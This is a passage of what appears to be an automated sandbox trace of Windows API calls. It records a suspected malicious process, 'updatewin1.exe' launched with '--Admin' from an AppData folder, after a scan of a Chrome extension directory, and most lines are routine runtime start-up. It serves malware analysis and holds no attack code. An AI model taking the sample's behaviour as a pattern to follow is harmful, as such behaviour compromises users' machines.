ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xea, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0137.698] FindClose (in: hFindFile=0x9144638 | out: hFindFile=0x9144638) returned 1 [0137.698] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d1020 | out: hHeap=0x3f0000) returned 1 [0137.698] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0137.698] FindNextFileA (in: hFindFile=0x9148b78, lpFindFileData=0x36dab0 | out: lpFindFileData=0x36dab0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9144638, dwReserved1=0x13d180a, cFileName="el", cAlternateFileName="")) returned 1 [0137.698] FindFirstFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*", lpFindFileData=0x36d878) Thread: id = 104 os_tid = 0xa10 Thread: id = 105 os_tid = 0x32c Thread: id = 107 os_tid = 0xb3c Thread: id = 109 os_tid = 0xb4c Thread: id = 110 os_tid = 0xb54 Thread: id = 111 os_tid = 0xab0 Thread: id = 113 os_tid = 0xac0 Thread: id = 114 os_tid = 0xab4 Thread: id = 121 os_tid = 0x440 Process: id = "10" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe" page_root = "0x3d39b000" os_pid = "0x43c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xb10" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe\" --Admin" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 108 os_tid = 0xb38 [0119.937] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xdf6d07a0, dwHighDateTime=0x1d6d58a)) [0119.937] GetCurrentProcessId () returned 0x43c [0119.937] GetCurrentThreadId () returned 0xb38 [0119.937] GetTickCount () returned 0x114ffd2 [0119.937] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=24046499094) returned 1 [0120.292] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0120.292] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x780000 [0120.293] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0120.294] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0120.294] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0120.294] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0120.294] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0120.294] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0120.294] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0120.294] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0120.294] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0120.295] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0120.295] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0120.295] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0120.295] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0120.295] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0120.295] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0120.295] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0120.295] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0120.296] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0120.296] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0120.296] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0120.296] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0120.297] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x214) returned 0x7807d0 [0120.297] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0120.297] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0120.297] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0120.297] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0120.297] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0120.298] GetCurrentThreadId () returned 0xb38 [0120.298] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0120.298] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x800) returned 0x7809f0 [0120.298] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0120.298] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0120.298] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.298] SetHandleCount (uNumber=0x20) returned 0x20 [0120.298] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe\" --Admin" [0120.298] GetEnvironmentStringsW () returned 0x564e78* [0120.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0120.298] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x565) returned 0x7811f8 [0120.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x7811f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0120.299] FreeEnvironmentStringsW (penv=0x564e78) returned 1 [0120.299] GetLastError () returned 0x0 [0120.299] SetLastError (dwErrCode=0x0) [0120.299] GetLastError () returned 0x0 [0120.299] SetLastError (dwErrCode=0x0) [0120.299] GetLastError () returned 0x0 [0120.299] SetLastError (dwErrCode=0x0) [0120.299] GetACP () returned 0x4e4 [0120.299] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x220) returned 0x781768 [0120.299] GetLastError () returned 0x0 [0120.299] SetLastError (dwErrCode=0x0) [0120.299] IsValidCodePage (CodePage=0x4e4) returned 1 [0120.299] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0120.299] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0120.299] GetLastError () returned 0x0 [0120.299] SetLastError (dwErrCode=0x0) [0120.299] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0120.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0120.300] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0120.300] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0120.300] GetLastError () returned 0x0 [0120.300] SetLastError (dwErrCode=0x0) [0120.300] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0120.300] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0120.300] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒇䣑㞕AĀ") returned 256 [0120.300] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒇䣑㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0120.300] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒇䣑㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0120.300] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x87©ÿF\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0120.300] GetLastError () returned 0x0 [0120.300] SetLastError (dwErrCode=0x0) [0120.300] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0120.300] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒇䣑㞕AĀ") returned 256 [0120.300] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒇䣑㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0120.300] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒇䣑㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0120.300] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x87©ÿF\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0120.300] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe")) returned 0x5f [0120.301] GetLastError () returned 0x0 [0120.301] SetLastError (dwErrCode=0x0) [0120.301] GetLastError () returned 0x0 [0120.301] SetLastError (dwErrCode=0x0) [0120.301] GetLastError () returned 0x0 [0120.301] SetLastError (dwErrCode=0x0) [0120.301] GetLastError () returned 0x0 [0120.301] SetLastError (dwErrCode=0x0) [0120.301] GetLastError () returned 0x0 [0120.301] SetLastError (dwErrCode=0x0) [0120.301] GetLastError () returned 0x0 [0120.301] SetLastError (dwErrCode=0x0) [0120.301] GetLastError () returned 0x0 [0120.301] SetLastError (dwErrCode=0x0) [0120.301] GetLastError () returned 0x0 [0120.301] SetLastError (dwErrCode=0x0) [0120.301] GetLastError () returned 0x0 [0120.301] SetLastError (dwErrCode=0x0) [0120.301] GetLastError () returned 0x0 [0120.302] SetLastError (dwErrCode=0x0) [0120.302] GetLastError () returned 0x0 [0120.302] SetLastError (dwErrCode=0x0) [0120.302] GetLastError () returned 0x0 [0120.302] SetLastError (dwErrCode=0x0) [0120.302] GetLastError () returned 0x0 [0120.302] SetLastError (dwErrCode=0x0) [0120.302] GetLastError () returned 0x0 [0120.302] SetLastError (dwErrCode=0x0) [0120.302] GetLastError () returned 0x0 [0120.302] SetLastError (dwErrCode=0x0) [0120.302] GetLastError () returned 0x0 [0120.302] SetLastError (dwErrCode=0x0) [0120.302] GetLastError () returned 0x0 [0120.302] SetLastError (dwErrCode=0x0) [0120.302] GetLastError () returned 0x0 [0120.302] SetLastError (dwErrCode=0x0) [0120.302] GetLastError () returned 0x0 [0120.303] SetLastError (dwErrCode=0x0) [0120.303] GetLastError () returned 0x0 [0120.303] SetLastError (dwErrCode=0x0) [0120.303] GetLastError () returned 0x0 [0120.303] SetLastError (dwErrCode=0x0) [0120.303] GetLastError () returned 0x0 [0120.303] SetLastError (dwErrCode=0x0) [0120.303] GetLastError () returned 0x0 [0120.303] SetLastError (dwErrCode=0x0) [0120.303] GetLastError () returned 0x0 [0120.303] SetLastError (dwErrCode=0x0) [0120.303] GetLastError () returned 0x0 [0120.303] SetLastError 